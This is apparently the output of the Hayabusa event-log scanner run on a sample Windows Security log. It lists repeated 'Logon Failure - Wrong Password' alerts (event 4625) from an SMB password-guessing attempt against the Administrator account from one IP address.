2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcprXytyuBw380XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxfQWiSIhZYxwNjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FcL982boDelzeyzK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBAAjRdaR8U0tqt7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EmqUjcltAW6StHQJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 129Rp3HCmRVRXw3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jpIIQP2oWEF51EBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HREGh5ppEkLAuEob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVkpQvotEMfM8R0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm6uHEy5RJJBJ6FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPTyAkYjcIlko5lu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OjlRoo9Sot4Fx4Th | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XslY26kw2aBw19D8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1404fakprYeqGiNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2VfIjtBcXCRlOjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPztyX4J9NV8EldT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 07flrrzWgsVBYaN2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vgkqkC1VvznGxR6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hMn6yDMLgLChJTL6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uSTokOJ31Tj0bLXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyRifC46GrNpTA4x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvNaby30vAT9drAX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wkYSOQ2bD51a4U8l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rqdOquL9Ax01RPPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nqCCiK5arcyRHha6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpyTGZLkAb0w0kgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wa2pXrZKxeZZYKAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dK0N5KeBgCze1YWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g4dHlwZjMzI5wU2s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GzF2ouP5KkRfsxnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSQxMrGlDiAOo6ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gL0rz3p1yG6RhfAT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyChoTSKgJeK6yqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG4I11dwpBM9SM3l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7foAZ5Y1igCbHap | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ATDXUljQwg8WvUVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdmXaJqQMAG2g6Ao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bjame5puT5CDeoIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0FGGVVkckmdURVh6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j0Smqw4cA4wG2Q6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLWloOhUYEQlj6y6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Tuxuykh0j5afeTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeXS6QwYhqJAOeuz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AqFSJCq5bmBW6dj1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DH1zyt1hxTgzajhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rrZxcWjUX4OgYYIb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ExtkYXSJI8F41uvw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sLh1Q3RieOoukiCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kNb2hZDxi4QrbQpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCb1TMlFj2PjH2sA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rgF42C57Nx6F3HU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KZfFH9geIrxVYowJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWz1XeyxywR0o5gS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: og1kItEC6WhqXF37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0KhaJlD6tWwF2ky | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUy0EKmjyD6ZYENA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h3MdGstPPFJDGzwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTs0ZQa6LGrKZKsY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FefzWjMXSvMdvqcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnUt9tPRSXR5mWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dehb4M6pcxi56Bkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tLXHvGiUqZyxax4W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP1gKcf1eeKm0RB1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldbN1odP77n0BOzO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: drRC8qCbPe5e4mdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lBg39AUtzZi6Q4iz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huv5YEPo1n7UiFkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9CLLwao1NDtBulxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SB88EHHhDWhvJI87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBvklueV4MZo3pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: noha7Vw85VfURHik | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wl5eIYvoKpJGUcSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsS3JTLUWcFYvxAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM6hj2bGxC124oZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
